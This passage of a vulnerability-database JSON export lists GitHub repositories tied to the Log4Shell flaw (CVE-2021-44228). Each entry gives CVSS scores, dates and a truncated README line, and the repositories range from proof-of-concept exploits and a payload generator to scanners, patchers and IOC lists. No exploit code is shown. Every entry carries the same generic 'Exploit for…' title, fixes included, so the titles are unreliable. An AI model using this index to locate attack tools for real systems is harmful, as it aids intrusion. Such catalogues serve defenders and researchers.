"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T12:33:03", "id": "9326CB66-BADC-5643-B118-F38C39A9E34C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-29T19:04:19", "description": "# CVE-2021-44228 Remote Code Injection In Log4j\n\nhttps://twitter...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T05:23:44", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-29T14:47:24", "id": "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T20:07:08", "description": "# log4shell-war-fixer\n\nLinux shell script that patches a WAR fil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T13:18:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T19:21:49", "id": "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:07", "description": "# log4j-win-quick\n\nDiscussed widely from December 2021. CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:45:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T00:52:01", "id": "48821FC8-9320-5568-88A3-9B2CC655ADAC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-19T02:42:16", "description": "# Log4j (log4shell) CVE-2021-44228 Public IOCs list\n\nPublic IOCs...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T18:52:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T23:50:50", "id": "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-28T02:09:47", "description": "# log4shell_scanner\nQuick and dirty scanner, hitting common port...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T19:36:29", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T19:40:45", "id": "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-14T14:29:45", "description": "# log4j-payload-generator\nlog4j-paylaod generator : A generic pa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:02:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T08:54:54", "id": "E4103A50-881C-52BB-86CC-27F549B798E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-14T05:29:51", "description": "# CVE-2021-44228 Vuln App\n\n[![Build](https://github.com/ahmad4fi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T04:13:13", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T04:13:24", "id": "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-18T23:41:33", "description": "# Log4Shell in action\n\nThis project aims to demonstrate how the ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T10:57:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-18T19:42:45", "id": "4DBC05D1-8178-5715-953D-61ECC89104F4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:14:34", "description": "# CVE-2021-44228-docker-example\n\nA simple demonstration of CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T10:53:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T03:58:51", "id": "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-10T13:10:23", "description": "# Spring Boot Log4j - CVE-2021-44228\n\nThe Log4Shell vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T16:54:33", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-10T11:52:26", "id": "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-01T04:50:49", "description": "# CVE-2021-44228\nLog4Shell Proof of Concept (CVE-2021-44228)\n\nMa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:19:17", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-07-01T01:56:25", "id": "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-01T04:51:40", "description": "[![(inett GmbH)](https://www.inett.de/assets/images/icons/inett....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T16:21:26", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-30T22:42:43", "id": "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T15:24:27", "description": "# Example of log4j exploit\n\nThis repo has a working sample of ab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T02:26:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T12:22:08", "id": "68DCAE72-CB86-55B9-9CB6-653918238C2B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-15T21:03:05", "description": "# Python Log4RCE\n\nAn all-in-one pure Python3 PoC for [CVE-2021-4...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T02:57:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-15T19:59:09", "id": "B22E3A22-BF14-5660-977A-2D28D2AA2500", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:16:05", "description": "# test-44228\n\nA simple example for [CVE-2021-44228](https://nvd....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-11T15:33:17", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T15:42:35", "id": "8F15A064-7841-5899-84CE-8C298A269F83", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:17:44", "description": "# LogJack Fix\n\nA spigot plugin to fix CVE-2021-44228 Log4j remot...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T04:20:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T05:11:17", "id": "2D2BE5CB-742A-5912-9D88-75365533F9E2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# NOTICE\nThis tool is no longer necessary mojang has released it...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T00:14:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T03:02:53", "id": "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-13T05:38:43", "description": "# Apache Log4j Zero Day aka Log4Shell aka CVE-2021-44228\n\n<!-- v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T10:55:35", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-12T16:35:41", "id": "40C633CE-4DD0-586D-8773-760E9A70FFBD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T20:08:56", "description": "\uacf5\uaca9\uc790\n\npython3 poc.py...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T14:01:23", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-18T17:13:29", "id": "39A13697-AF09-5E14-9DE2-045005EA9D85", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T23:17:31", "description": "# jndiRep - CVE-2021-44228\nBasically a **bad** grep on even **wo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, 